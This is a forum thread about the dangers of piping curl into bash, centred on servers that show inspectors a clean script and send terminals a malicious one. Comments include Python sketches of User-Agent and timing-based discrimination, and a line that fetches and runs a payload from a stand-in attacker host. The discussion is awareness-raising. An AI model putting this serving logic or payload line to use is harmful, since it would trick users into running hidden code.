A sneaky demonstration of the dangers of curl bash (blog.k3can.us)
from K3can@lemmy.radio to selfhosted@lemmy.world on 22 Feb 17:38
https://lemmy.radio/post/12010162

I set up a quick demonstration to show the risks of curl | bash and how a bad actor could potentially hide a malicious script that appears safe.

It’s nothing new or groundbreaking, but I figure it never hurts to have another reminder.

#selfhosted


osanna@thebrainbin.org on 22 Feb 17:39 next collapse

you’d have to be mad to willingly pipe a script to bash without checking it. holy shit

wildbus8979@sh.itjust.works on 22 Feb 17:44 next collapse

And you’d better inspect and execute a downloaded copy, because a malicious actor can serve a different file to curl/wget than to your browser

Flipper@feddit.org on 22 Feb 17:54 next collapse

They can even serve a different file for curl vs curl|bash

wildbus8979@sh.itjust.works on 22 Feb 18:02 next collapse

Yeah they do; I remember the demo being pretty impressive ten or fifteen years ago!

deadbeef79000@lemmy.nz on 22 Feb 19:48 collapse

Does curl send a different useragent when it’s piped?

Searching for those words just vomits ‘hOW to SeT cUrL’s UseRaGenT’ blog spam.

qupada@fedia.io on 22 Feb 20:30 next collapse

Not that I know of, which means I can only assume it'll be a timing-based attack.

With strategic use of sleep statements in the script, you should stand a pretty good chance of detecting the HTTP download stalling while script execution is paused.

If you were already shipping the kind of script that unpacks a binary payload from the tail end of the file and executes it, it's well within the realm of possibility to swap it for a different one.

Flipper@feddit.org on 22 Feb 21:25 collapse

It’s timing-based. When a script is piped in, bash executes each line completely before reading the next one from the input, and curl has a limited output buffer.

  1. Include an operation that takes a long time: a sleep, or, if you want it less obvious, a download, an unzip operation, an apt update, etc.
  2. Fill the buffer with more bash commands.
  3. On the server, measure whether curl stops downloading the script at some point.
  4. If it does, serve a malicious payload.
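
The flow above can be sketched in Python (a hypothetical illustration of the classification step; the names and thresholds are mine, not from the linked demo, and a real server would also have to juggle socket buffer sizes):

```python
# Hypothetical server-side logic for detecting curl | bash by timing.
# All names and numbers here are illustrative.

SLEEP_SECONDS = 5        # the long-running command planted in the script
STALL_TOLERANCE = 1.0    # how close the observed stall must be to the sleep

def is_piping_to_bash(chunk_send_times, sleep_chunk_index):
    """Classify a client from the times at which it accepted each chunk.

    A browser or a plain `curl -o file` drains the response as fast as
    the network allows. With `curl | bash`, bash stops reading while it
    runs the planted sleep, so once curl's buffer fills, the chunk after
    the sleep line stalls for roughly SLEEP_SECONDS.
    """
    if sleep_chunk_index + 1 >= len(chunk_send_times):
        return False  # connection ended before the sleep line executed
    stall = (chunk_send_times[sleep_chunk_index + 1]
             - chunk_send_times[sleep_chunk_index])
    return stall >= SLEEP_SECONDS - STALL_TOLERANCE

def script_tail(piping):
    """Serve a benign ending to inspectors, a nasty one to pipers."""
    return "echo gotcha\n" if piping else "echo all good\n"
```
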
deadbeef79000@lemmy.nz on 23 Feb 09:44 collapse

Oh that is clever.

K3can@lemmy.radio on 22 Feb 18:00 next collapse

Yep! That’s what the post shows.

I created a live demo file, too, so that you can actually see the difference based on how you request the file.

csm10495@sh.itjust.works on 22 Feb 22:32 collapse

Hit the nail on the head. Download the file, inspect, then run that local copy.

cecilkorik@piefed.ca on 22 Feb 18:53 next collapse

And it’s wild how much even that has been absolutely normalized by all these shitty lazy developers and platforms. Vibe coding is just going to make it worse. All these programs that look nice on the surface and are just slop on the inside. It’s going to be a mess.

BluescreenOfDeath@lemmy.world on 22 Feb 19:06 next collapse

The post is specifically about how you can serve a totally different script than the one you inspect. If you use curl to fetch the script via terminal, the webserver can send a different script to a browser based on the UserAgent.
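
The server side of that trick fits in a few lines (a hypothetical sketch in Python; the live demo in the post may be implemented differently):

```python
# Hypothetical sketch: serve browsers a clean script and terminals
# something else, based purely on the User-Agent header.
from http.server import BaseHTTPRequestHandler

BENIGN = "#!/bin/sh\necho 'installing...'\n"
MALICIOUS = "#!/bin/sh\ncurl -s https://evil.example/payload | sh\n"

def pick_script(user_agent):
    """Choose which script body to serve for a given User-Agent."""
    ua = (user_agent or "").lower()
    if ua.startswith("curl/") or ua.startswith("wget/"):
        return MALICIOUS  # a terminal fetch, quite possibly piped to a shell
    return BENIGN         # likely a browser, i.e. a human inspecting the file

class InstallScriptHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = pick_script(self.headers.get("User-Agent"))
        self.send_response(200)
        self.send_header("Content-Type", "text/x-shellscript")
        self.end_headers()
        self.wfile.write(body.encode())
```
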

And whether or not you think someone would be mad to do it, it’s still a widespread practice. The article mentions that piping curl straight to bash is already standard procedure for Proxmox helper scripts. But don’t take anyone’s word for it, check it out:

community-scripts.github.io/ProxmoxVE/

It’s also the recommended method for PiHole:

docs.pi-hole.net/main/basic-install/

mrnobody@reddthat.com on 22 Feb 20:38 collapse

The reality is that a lot of newcomers to Linux won’t even understand the risks involved; they run it because that’s what they’re told or shown to do. That’s what I did for pihole many years ago too, I’ll admit.

atzanteol@sh.itjust.works on 22 Feb 21:46 next collapse

I’ve been accused of “gate keeping” when I tell people that this is a shitty way to deploy applications and that nobody should do it.

BluescreenOfDeath@lemmy.world on 23 Feb 14:24 collapse

Users are blameless, I find the fault with the developers.

Asking users to pipe curl to bash because it’s easier for the developer is just the developer being lazy, IMO.

Developers wouldn’t get a free pass for taking lazy, insecure shortcuts in programming, I don’t know why they should get a free pass on this.

jtrek@startrek.website on 22 Feb 19:45 next collapse

Most developers I’ve looked at would happily just paste the curl|bash thing into the terminal.

I often would skim the script in the browser, but (a) this post shows that’s not foolproof, and (b) a sufficiently sophisticated malicious script would fool a casual read.

Ephera@lemmy.ml on 22 Feb 21:56 collapse

Most developers I’ve looked at would happily just paste the curl|bash thing into the terminal.

I mean, I typically see it used for installing applications, and so long as TLS is used for the download, I’m still not aware of a good reason why you should check the Bash script in particular in that case, since the application itself could just as well be malware.

Of course, it’s better to check the Bash script than to not check it, but at that point we should also advise to download the source code for the application, review it and then compile it yourself.
At some point, you just have to bite the bullet and I have not yet seen a good argument why the Bash script deserves special treatment here…

Having said that, for cases where you’re not installing an application, yeah, reviewing the script allows you to use it, without having to trust the source to the same degree as you do for installing an application.

Wildmimic@anarchist.nexus on 22 Feb 21:26 next collapse

In addition to the other examples, it’s also the default installation method for nvm, the version manager commonly used to install Node.js

Ya cant even blame someone non-technical falling for this if they haven’t been explicitly informed - it’s getting reinforced as completely normal by too many “reputable” projects.

porcoesphino@mander.xyz on 22 Feb 22:32 collapse

I’m pretty sure brew on mac is the same too

Dave@lemmy.nz on 22 Feb 21:46 next collapse

Is it different from running a bash script you downloaded without checking it? E.g. the installer that you get with GOG games?

Genuine question, I’m no expert.

osanna@thebrainbin.org on 22 Feb 21:50 next collapse

I have no problems with running scripts from the internet, AFTER you check them. Do NOT blindly run a script you found on the internet. As others have said download them, then check them, then and only then run them if they're safe. NEVER pipe to bash, ever.

Dave@lemmy.nz on 22 Feb 21:52 collapse

Ok but not everyone has that skill. And anyway, how is this different to running a binary where you can’t check the code?

osanna@thebrainbin.org on 22 Feb 21:55 collapse

it's exactly the same. Don't run binaries you don't trust fully. But i get what you mean. miley_cyrus_nude.jpg.exe is probably gonna end badly.

Dave@lemmy.nz on 22 Feb 22:33 collapse

Yeah I get that, but I would install docker, cloudflared, etc by piping a convenience script to bash without hesitation. I’ve already decided to install their binary, I don’t see why the install script is any higher risk.

I know it’s a controversial thing for everyone to make their own call on, I just don’t think the risk for a bash script is any higher than a binary.

osanna@thebrainbin.org on 22 Feb 22:36 next collapse

the difference though is you can check a script. if it’s an open source project, you can also compile from source. but I get what you mean

Dave@lemmy.nz on 22 Feb 22:40 collapse

You can, but to me it seems weird to say it’s crazy to pipe to bash when people happily run binaries. If anything, the convenience script is lower risk than the binary since people have probably checked it before you.

I wouldn’t pipe a random script to bash though, nothing where I wouldn’t trust the people behind it.

moonpiedumplings@programming.dev on 23 Feb 00:01 collapse

I won’t lie, I use curl | bash as well, but I do dislike it for two reasons:

Firstly, it is much, much easier to compromise the website hosting than the binary itself, usually. Distributed binaries are usually signed by multiple keys from multiple servers, resulting in them being highly resistant to tampering. Reproducible builds (two users compiling a program get the same output) make it trivial to detect tampering as well.

On the other hand, website hosting infrastructure is generally nowhere near as secure. It’s typically one or two VPSes, and there is no signature or verification that the content is “official”. So even if I can’t tamper with the binary, I can still tamper with the bash script to add extra goodies to it.

On the other hand (not really relevant to what OP is talking about), just because I trust someone to give me a binary in a mature programming language they have experience writing in doesn’t mean I trust them to give me a script in a language known for footguns. A bug in Steam’s bash script once deleted a user’s home directory. There have also been issues with AUR packages, which are basically bash scripts, breaking people’s systems. When it comes to user/community-created scripts, I mostly trust them not to be malicious; I’m more fearful of a bug or mistake screwing things up. But at the same time, I have little confidence in my ability to spot those bugs.

Generally, I only make an exception for running bash installers if the program being installed is a “platform” that I can use to install more software. K3s (Kubernetes distro), or the Nix package manager are examples. If I can install something via Nix or Docker then it’s going to be installed via there and not installed via curl | bash. Not every developer under the sun should be given the privilege of running a bash script on my system.

As a sidenote, docker doesn’t recommend their install script anymore. All the instructions have been removed from the website, and they recommend adding their own repos instead. Personally, I prefer to get it from the distro’s repositories, as that’s usually the simplest and fastest way to install docker nowadays.

Dave@lemmy.nz on 23 Feb 00:15 collapse

Firstly, it is much, much easier to compromise the website hosting than the binary itself, usually. Distributed binaries are usually signed by multiple keys from multiple servers, resulting in them being highly resistant to tampering. Reproducible builds (two users compiling a program get the same output) make it trivial to detect tampering as well.

Yeah this is a fair call.

But at the same time, I have little confidence in my ability to spot these bugs.

This is the key thing for me. I am not likely to spot any issues even if they were there! I’d only be scanning for external connections or obviously malicious code, which I do when I don’t have as much trust in the source.

As a sidenote, docker doesn’t recommend their install script anymore.

Yeah I used it as an example because there are very few times I ever remember piping to bash, but that’s probably the most common one I have done in the past.

surewhynotlem@lemmy.world on 23 Feb 04:16 next collapse

It’s really only about trusting the source. Your operating system surely has thousands of scripts that you’ve never read and never checked. And wouldn’t have time to. And people don’t complain about that.

But it’s really bad practice to run random things from random sites. So the practice of downloading a script and running it is frowned upon. Mostly as a way of maintaining good security hygiene.

axx@slrpnk.net on 23 Feb 09:31 collapse

It is, see github.com/m4tx/curl-bash-attack

Dave@lemmy.nz on 23 Feb 10:11 collapse

That’s an interesting proof of concept, but I don’t think it shows it’s different. That’s a server side attack, whoever has control of the server could just have the script download a malicious binary instead and you wouldn’t be able to tell from the script.

one_knight_scripting@lemmy.world on 22 Feb 23:03 collapse

I mean, true, but most of the things I do that with are private scripts that I wrote. I think the main exception to that is Oh-my-zsh.

Also it’s not really a full pipe…

bash <(curl cht.sh/curl)

That uses process substitution: bash reads curl’s output through a file descriptor (something like /dev/fd/63) rather than from stdin. Frankly, the URL I gave is a bad example, because it’s not actually a script, just the help page for curl, and it would be better if it weren’t nested.

osanna@thebrainbin.org on 22 Feb 23:07 collapse

the article isn’t about scripts you wrote yourself. run your own scripts all you like.

Decronym@lemmy.decronym.xyz on 22 Feb 20:40 next collapse

Acronyms, initialisms, abbreviations, contractions, and other phrases which expand to something larger, that I’ve seen in this thread:

Fewer Letters More Letters
DNS Domain Name Service/System
HTTP Hypertext Transfer Protocol, the Web
PiHole Network-wide ad-blocker (DNS sinkhole)
SSL Secure Sockets Layer, for transparent encryption
TLS Transport Layer Security, supersedes SSL
VPS Virtual Private Server (opposed to shared hosting)

5 acronyms in this thread; the most compressed thread commented on today has 12 acronyms.

[Thread #111 for this comm, first seen 23rd Feb 2026, 04:40] [FAQ] [Full list] [Contact] [Source code]

quick_snail@feddit.nl on 23 Feb 06:13 collapse

Good bot

krispyavuz@lemmy.world on 23 Feb 03:46 next collapse

Curl bash is no different than manually running an sh script you don’t know…

K3can@lemmy.radio on 23 Feb 04:26 next collapse

True, but this is specifically about scripts you think you know, and how curl bash might trick you into running a different script entirely.

axx@slrpnk.net on 23 Feb 09:30 collapse

No, it is different, as it adds an entire layer of indirection and unknown to the mix, increasing the risk in the process.

xylogx@lemmy.world on 23 Feb 05:17 next collapse

Yes, this has risks. At the same time, any time you run any piece of software you face the same risks, especially if that software is updated from the internet. Take a look at the NIST docs on software supply chain risks.

ShortN0te@lemmy.ml on 23 Feb 05:57 next collapse

Not completely correct. A lot of updaters work with signatures to verify that what was downloaded is signed by the correct key.

With curl | bash there is no such check in place.

So strictly speaking it is not the same.
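
For contrast, the shape of a verified download is roughly this (a minimal sketch using a pinned SHA-256 digest; real updaters verify asymmetric signatures rather than a bare hash, but the fail-closed structure is the same, and curl | bash simply has no equivalent step):

```python
import hashlib
import urllib.request

def digest_ok(data, expected_sha256_hex):
    """True when the payload matches a digest published out-of-band."""
    return hashlib.sha256(data).hexdigest() == expected_sha256_hex

def verified_download(url, expected_sha256_hex):
    """Download url and refuse to return the payload unless it verifies."""
    with urllib.request.urlopen(url, timeout=30) as resp:
        data = resp.read()
    if not digest_ok(data, expected_sha256_hex):
        raise ValueError("digest mismatch: refusing to use this payload")
    return data
```
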

xylogx@lemmy.world on 23 Feb 06:54 collapse

Signatures do not help if your distribution infra gets compromised. See Solarwinds and the more recent node.js incidents.

ShortN0te@lemmy.ml on 23 Feb 07:06 next collapse

This is incorrect. If the update you download is compromised then the signature is invalid and the update fails.

To achieve a compromised update you either need to compromise the update infrastructure AND the key, or the infrastructure AND exploit the local updater to accept an invalid or forged signature.

xylogx@lemmy.world on 23 Feb 07:29 collapse

If I can control your infra, I can alter what counts as a valid signature. It has happened. It will happen again. Digital signatures are not sufficient by themselves to prevent supply chain risks. Depending on your threat model, you need to assume advanced adversaries will seek to gain a foothold in your environment by attacking your software supplier. In these types of attacks, threat actors can and will take control of the distribution mechanisms, deploying trojaned backdoors as part of legitimately signed updates. It is a complex problem and I highly encourage you to read the NIST guidance to understand just how deep the rabbit hole goes.

Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations

ShortN0te@lemmy.ml on 23 Feb 08:44 collapse

No you cannot: the public key either ships inside the updater or comes from infrastructure that isn’t owned by you. The way most software suppliers do it, the public key is supplied within the updater.

xylogx@lemmy.world on 23 Feb 10:00 collapse

Not sure how else to explain this. Look at the CISA bulletin on Shai-Hulud: the attacker published valid, signed packages that were installed by hundreds of users.

"CISA is releasing this Alert to provide guidance in response to a widespread software supply chain compromise involving the world’s largest JavaScript registry, npmjs.com. A self-replicating worm—publicly known as “Shai-Hulud”—has compromised over 500 packages.[i]

After gaining initial access, the malicious cyber actor deployed malware that scanned the environment for sensitive credentials. The cyber actor then targeted GitHub Personal Access Tokens (PATs) and application programming interface (API) keys for cloud services, including Amazon Web Services (AWS), Google Cloud Platform (GCP), and Microsoft Azure.[ii]

The malware then:

  • Exfiltrated the harvested credentials to an endpoint controlled by the actor.
  • Uploaded the credentials to a public repository named Shai-Hulud via the GitHub/user/repos API.
  • Leveraged an automated process to rapidly spread by authenticating to the npm registry as the compromised developer, injecting code into other packages, and publishing compromised versions to the registry.[iii]"
ShortN0te@lemmy.ml on 23 Feb 10:21 collapse

After gaining initial access, the malicious cyber actor deployed malware that scanned the environment for sensitive credentials.

So, as I said, the keys got compromised. That’s what I said in my second post.

xylogx@lemmy.world on 23 Feb 11:29 collapse

What you said is that the key infra needs to get compromised. I do not need to own the PKI that issued the certs; I just need the private key of the signer. And again, this is something that happens. A lot. A software publisher gets owned, then their account is used to distribute malware.

ShortN0te@lemmy.ml on 23 Feb 11:58 collapse

To achieve a compromised update you either need to compromise the update infrastructure AND the key, or the infrastructure AND exploit the local updater to accept an invalid or forged signature.

As I said, to compromise a signature-checked update over the internet you need to compromise both the distributing infrastructure AND the key. With just one of them it’s not possible (ignoring flaws in the code, of course).

xylogx@lemmy.world on 23 Feb 13:29 collapse

Take a look at Shai Hulud. All the attacker had was the key.

ShortN0te@lemmy.ml on 23 Feb 15:48 collapse

Yes, the secrets to submit to the distribution system got compromised and therefore the system got compromised.

axx@slrpnk.net on 23 Feb 09:28 collapse

Please tell me you are not seriously equating a highly sophisticated attack like the SolarWinds compromise with piping curl to bash?

quick_snail@feddit.nl on 23 Feb 06:12 next collapse

Apt is great

axx@slrpnk.net on 23 Feb 09:27 next collapse

This is a bit like saying crossing the street blindfolded while juggling chainsaws and crossing the street on a pedestrian crossing while the light is red for cars both carry risk. Sure. One’s a terrible idea though.

Nibodhika@lemmy.world on 23 Feb 11:57 collapse

But those are two very different things. I can very easily give you a one-liner using curl | bash that will compromise your system. To get the same level of compromise through a properly authenticated channel such as apt/pacman/etc., you would need either to compromise their private keys and attack before they notice and rotate them, or to sneak malicious code into an official package; either of those is orders of magnitude more difficult than writing a simple bash script.

xylogx@lemmy.world on 23 Feb 13:26 collapse

I would feel more comfortable running curl bash from a trusted provider than doing apt get from an unknown software repo. What you are trying to do is establish trust in your supply chain, the delivery vehicle is less important.

Nibodhika@lemmy.world on 23 Feb 23:35 collapse

But what is a trusted provider? How can you trust it? How sure are you that you’re not being MitM’d? Have you fully verified by hand that there are no funky flags in the curl invocation like -k, that the URL uses SSL, that it’s the correct URL and not pointing at something malicious, etc.? There are a lot of manual steps to verify with this approach, whereas a package manager checks all of them automatically, plus extra safeguards like hundreds of people having validated the content.

To do apt get from an unknown repo, you first need to convince the person to execute root commands they don’t understand on their machine to add that unknown repo, and if you can convince someone to run an unsafe command with root credentials then the machine is already compromised.

I get your point: random internet scripts are dangerous, but random internet packages can also be dangerous. It’s still a false equivalence, though, because there are lots of safeguards around packages as people usually install them, and essentially zero safeguards around curl | bash. It’s as if, in a post about the dangers of fireworks and how you can blow yourself up with them, your answer were “but someone can plant a bomb in the mall I go to, or steal the codes for a nuclear missile and blow me up anyway”.

quick_snail@feddit.nl on 23 Feb 06:11 next collapse

Anytime I see a project that had this in their install instructions, I don’t use that project.

It shows how dumb the devs are

axx@slrpnk.net on 23 Feb 09:29 collapse

Yes, this is the correct approach from a security perspective.

quick_snail@feddit.nl on 23 Feb 06:16 next collapse

a more cautious user might first paste the url into the address bar of their web browser to see what the script looks like before running it.

Wow, I never thought anyone would be that dumb.

Why wouldn’t they just wget it, read it, and then execute it?

axx@slrpnk.net on 23 Feb 09:25 collapse

Oh, the example in the article is the nice version of this attack.

Checking the script as downloaded by wget or curl and then piping curl to bash is still a terrible idea, as you have no guarantee you’ll get the same script both times.

sturmblast@lemmy.world on 23 Feb 07:17 next collapse

You mean blindly running code is bad? /s

oeLLph@feddit.org on 23 Feb 07:18 next collapse

@K3can@lemmy.radio love the early 2000s stylesheet/color theme of your blog 🙂

K3can@lemmy.radio on 23 Feb 08:16 collapse

Thanks! I like to keep things simple. The colors are based on Counter Strike 1.6. 😁

And if you’re into the classic styling, my homepage is a direct homage to my old 2000s sites.

Mister_Hangman@lemmy.world on 24 Feb 10:53 collapse

Hahahaha noticed this too. 1.5 was where it was at tho

ikidd@lemmy.world on 23 Feb 07:42 next collapse

Oh, people will keep using it no matter how much you warn them.

Proxmox-helper-scripts is a perfect example. They’ll agree with you until that site comes up, and then it’s “it’ll never, ever get hacked and subverted, nope, can’t happen, impossible”.

Wankers.

corsicanguppy@lemmy.ca on 23 Feb 09:07 collapse

I was looking at that very thing last night.

But then I realized, “why can’t immich just create usable packages like we had before?” and noped back out.

But, for a moment, I was sure a little inspection and testing would make the Internet equivalent of NYC MTA coin-sucking magically safe. It looked so eeeeasy.

aeiou_ckr@lemmy.world on 23 Feb 10:39 next collapse

This helped a lot. I had no clue I could paste the URL from the curl command into a browser to view the script. Thanks for the education!

Nibodhika@lemmy.world on 23 Feb 11:44 next collapse

You didn’t know that the tool for handling URLs written in C (very creatively named cURL) was handling URLs? It’s also written in C, if you didn’t know.

smeenz@lemmy.nz on 23 Feb 12:16 next collapse

You had no idea you could paste a url into a browser’s location bar ?

aeiou_ckr@lemmy.world on 24 Feb 10:24 collapse

I wasn’t looking to get roasted for not knowing something. Guess that teaches me something else: so much for thanking people for sharing something I didn’t know.

smeenz@lemmy.nz on 24 Feb 12:58 collapse

I think the general response is from confusion over what you could possibly have been using the url bar for in your browser if you didn’t know you could put urls there.

floquant@lemmy.dbzer0.com on 23 Feb 14:08 collapse

Shit are URLs esoteric knowledge now?

MehBlah@lemmy.world on 23 Feb 10:47 next collapse

Never have I ever piped curl to bash.

It_Is1_24PM@lemmy.world on 23 Feb 11:06 next collapse

I never thought about opening it in a browser. I always used curl to download such a script and view it where it was supposed to be run.

Buddahriffic@lemmy.world on 23 Feb 15:03 next collapse

An alternative that will avoid the user agent trick is curl | cat, which just prints the script to the console. curl > filename.sh will write it to a script file that you can review, mark executable, and run if you deem it safe; that’s safer than a curl | cat followed by a curl | bash (because the second curl could still return a different set of commands).

You can control the user agent with curl and spoof a browser’s user agent for one fetch, then a second fetch using the normal curl user agent and compare the results to detect malicious urls in an automated way.
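
That double-fetch check can be automated in a few lines (a sketch; it assumes the server discriminates only on User-Agent, so a timing-based server like the one described earlier in the thread would still evade it):

```python
import sys
import urllib.request

CURL_UA = "curl/8.5.0"                          # how a terminal fetch looks
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64)"  # how an inspecting human looks

def fetch(url, user_agent):
    """Download url while presenting the given User-Agent header."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read()

def bodies_differ(body_a, body_b):
    """True when the two responses are not byte-identical."""
    return body_a != body_b

def looks_suspicious(url):
    """Fetch twice with different User-Agents and compare the results."""
    return bodies_differ(fetch(url, CURL_UA), fetch(url, BROWSER_UA))

if __name__ == "__main__" and len(sys.argv) > 1:
    print("DIFFERS" if looks_suspicious(sys.argv[1]) else "identical")
```
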

A command-line analyzer tool would be nice for people who aren’t as familiar with the commands and arguments (and to defeat obfuscation), though I suspect the general problem is undecidable, so it won’t likely ever be completely foolproof. Maybe it could be if the script were run in a sandbox to see what it does instead of just being analyzed.

neidu3@sh.itjust.works on 23 Feb 17:22 next collapse

Running arbitrary text from the internet through an interpreter… what could possibly go wrong.

I need to set up a website with

fork while 1

…Just so I can (try to) convince people to

curl | perl

it

…rhyme intended.

mlg@lemmy.world on 24 Feb 00:06 next collapse

Use our easy bash oneliner to install our software!

Looks inside script

if [ "$(command -v apt-get)" ]; then apt-get install app; else echo "Unsupported OS"; fi

Still less annoying than trying to build something from source where the dev claims it has like 3 dependencies but in reality it requires 500MB of random packages you’ve never even heard of, all while their build system doesn’t do any pre-compile checking, so the build fails after a solid hour of compilation.

ssfckdt@lemmy.blahaj.zone on 24 Feb 00:29 collapse

I’m a bit lost with

a more cautious user might first paste the url into the address bar of their web browser to see what the script looks like before running it.

You… You just… You just dump the curl output to file and examine that and then run it if its good

Just a weird imagined sequence to me.

martini1992@lemmy.ml on 24 Feb 01:26 collapse

Worse than that, the server can change its response based on user agent, so you need to curl it to a file first; a browser could be served a completely different response.

K3can@lemmy.radio on 24 Feb 02:30 collapse

Which is exactly what is demonstrated in the post. 🙃